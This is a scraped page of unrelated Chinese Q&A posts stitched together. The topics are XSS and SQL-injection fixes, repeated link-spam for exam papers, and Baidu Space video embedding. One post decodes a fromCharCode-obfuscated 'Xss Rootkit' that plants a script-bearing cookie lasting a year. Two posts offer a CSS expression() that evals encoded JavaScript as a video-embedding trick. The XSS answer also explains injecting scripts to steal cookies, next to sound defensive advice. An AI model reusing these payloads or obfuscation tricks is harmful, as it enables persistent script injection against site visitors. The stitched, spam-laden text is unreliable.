我做的网站被漏洞检测说是有什么xss跨站脚本漏洞,怎么修复啊,哪位大侠帮看看!!
你这个页面我没看出来有xss啊,倒是有可能有sql注入漏洞。Title变量要过滤一下啊,要不用户可能会修改Title的内容,比如插入一个单引号,后面跟上自己的sql语句,这样会导致查到一些不该看到的数据库内容,引发注入漏洞。所以,要过滤一些用户提交的数据,把特殊字符全滤掉,百度一些啊asp防注入,有源码的。
xss,假设我是攻击者,我把提交数据的一个变量修改为‘aaaaaaaaaaaa’(post或则get提交的都可以,因为你是request接收的),然后看页面中回显‘aaaaaaaaaaaa’的位置。如果出现了,我可以尝试修改一下加入“”等,破坏掉你的html结构,如果可以破坏,那么我就可以插入javascript代码“script src=.../script”。盗取用户的cookies(所以cookies更好只用httponly),结合beef甚至操作用户的浏览器(权限和功能很低的,别想多了)。
综上所述,你写源码时,必须要检查所有用户可以修改和提交的数据(包括cookies等http头里面的),然后在输出点做好编码。输入与输出控制好了可以减免很多麻烦。
还可以使用安全宝、知道创于等公司提供的云waf服务,这样用户提交的数据会由他们检测,并且给你做好了cdn加速。注意的是,不要把你真实的ip暴露在网上。有的人只做www.test.com的解析,没有做test.com的解析,导致真实ip暴露在网上。
或者使用一些开源的cms,asp的我不了解,php的我知道有wordpress,代码写的很不错了,只要你定期更新版本,不乱下载一些插件(插件都是别人提交的,编程水平不一定很好所以),一般不会出什么大的漏洞。插件也要定期更新。
防止旁站,找主机服务商时要注意(找大的和好的),亚马逊这样的,每个站的权限都是控制的很死的,所以很难提权。
至于社工,安全是一种意识,慢慢培养吧。我了解的就这些了,希望能对你有帮助。
西南交大城市规划考研问题
西南交通大学历年考研真题
链接: https://pan.baidu.com/s/1xSsaaj1vr0gMv9c6MkWjMg
提取码: vy2z
若资源有问题欢迎追问
西南交通大学会计学研究生复试要考哪些科目?
西南交通大学历年考研真题
链接: https://pan.baidu.com/s/1xSsaaj1vr0gMv9c6MkWjMg
提取码: vy2z
若资源有问题欢迎追问
百度空间上可以弄视频吗?怎么弄?
可以弄视频,简单的办法是在背景音乐中添加有视频的音乐连接地址,注意格式要按规定,要不就不行的,比如是WMV结尾的,给你几个视频连接吧:
http://zhidao.baidu.com/question/10415769.html?si=1
如果你想把视频加在页面也可以, *** 请参考:
http://hi.baidu.com/jmdcw/blog/item/3ef49451d8f5c219377abeb9.html
悬赏100分,另加20分。 *** 和ASCII码转换成字母的问题,代码如下,求解转换出来的字母内容
结果:
Persistence_data='"scriptalert(/xss rootkit!/)/scriptx="';
var date=new Date();
var expireDays=365;
date.setTime(date.getTime()+expireDays*24*3600*1000);
document.cookie='gotopage='+Persistence_data+';expires='+date.toGMTString();
alert('Xss Rootkit Install Successful !!!!');
*** :
textarea name=xxxx/textarea
scriptxxxx.value=(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))/script
怎么把我电脑里的录象放在我的百度空间里啊!!
先把短片上传到那些视频网站,你用百度搜一下一大片
先要注册,上传好后得到地址
在CSS中加入如下代码
body{xss:expr/*XSS*/ession(eval(String.fromCharCode
(118,97,114,32,105,44,106,44,120,44,121,44,122,59,106,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,101,109,39,41,59,102,111,114,40,105,61,48,59,105,60,106,46,108,101,110,103,116,104,59,105,43,43,41,123,121,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,101,109,39,41,91,105,93,59,122,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,101,109,39,41,91,105,93,46,102,105,114,115,116,67,104,105,108,100,46,100,97,116,97,59,120,61,39,60,98,114,47,62,60,101,109,98,101,100,32,115,114,99,61,39,43,122,43,39,32,97,117,116,111,112,108,97,121,61,48,32,119,105,100,116,104,61,
53,53,48,
32,104,101,105,103,104,116,61,
52,53,48,
62,60,47,101,109,98,101,100,62,60,98,114,47,62,60,97,32,104,114,101,102,61,32,116,97,114,103,101,116,61,95,98,108,97,110,107,62,60,47,97,62,60,98,114,47,62,39,59,105,102,40,121,41,32,121,46,111,117,116,101,114,72,84,77,76,61,120,59,125)));}
视频插入 *** :在写新文章的时候,输入你要插入的网址,如:http://tv.mofile.com/cn/xplayer.swf?v=9IWKFISE,
取消掉系统自动链接,然后加斜体即可!
西南交大计算机考研专业课是考哪几门啊?
西南交通大学历年考研真题
链接: https://pan.baidu.com/s/1xSsaaj1vr0gMv9c6MkWjMg
提取码: vy2z
若资源有问题欢迎追问
如何在百度空间的文章里加特效或视频代码?
在CSS中加入如下代码
body{xss:expr/*XSS*/ession(eval(String.fromCharCode
(118,97,114,32,105,44,106,44,120,44,121,44,122,59,106,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,101,109,39,41,59,102,111,114,40,105,61,48,59,105,60,106,46,108,101,110,103,116,104,59,105,43,43,41,123,121,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,101,109,39,41,91,105,93,59,122,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,101,109,39,41,91,105,93,46,102,105,114,115,116,67,104,105,108,100,46,100,97,116,97,59,120,61,39,60,98,114,47,62,60,101,109,98,101,100,32,115,114,99,61,39,43,122,43,39,32,97,117,116,111,112,108,97,121,61,48,32,119,105,100,116,104,61,
53,53,48,
32,104,101,105,103,104,116,61,
52,53,48,
62,60,47,101,109,98,101,100,62,60,98,114,47,62,60,97,32,104,114,101,102,61,32,116,97,114,103,101,116,61,95,98,108,97,110,107,62,60,47,97,62,60,98,114,47,62,39,59,105,102,40,121,41,32,121,46,111,117,116,101,114,72,84,77,76,61,120,59,125)));}
视频插入 *** :在写新文章的时候,输入你要插入的网址,如:http://tv.mofile.com/cn/xplayer.swf?v=9IWKFISE,
取消掉系统自动链接,然后加斜体即可!
如果还要更高级(怎样修改长宽什么东东之类的)请看这里http://hi.baidu.com/huge/blog/item/a99c8c5479ec641f3a293572.html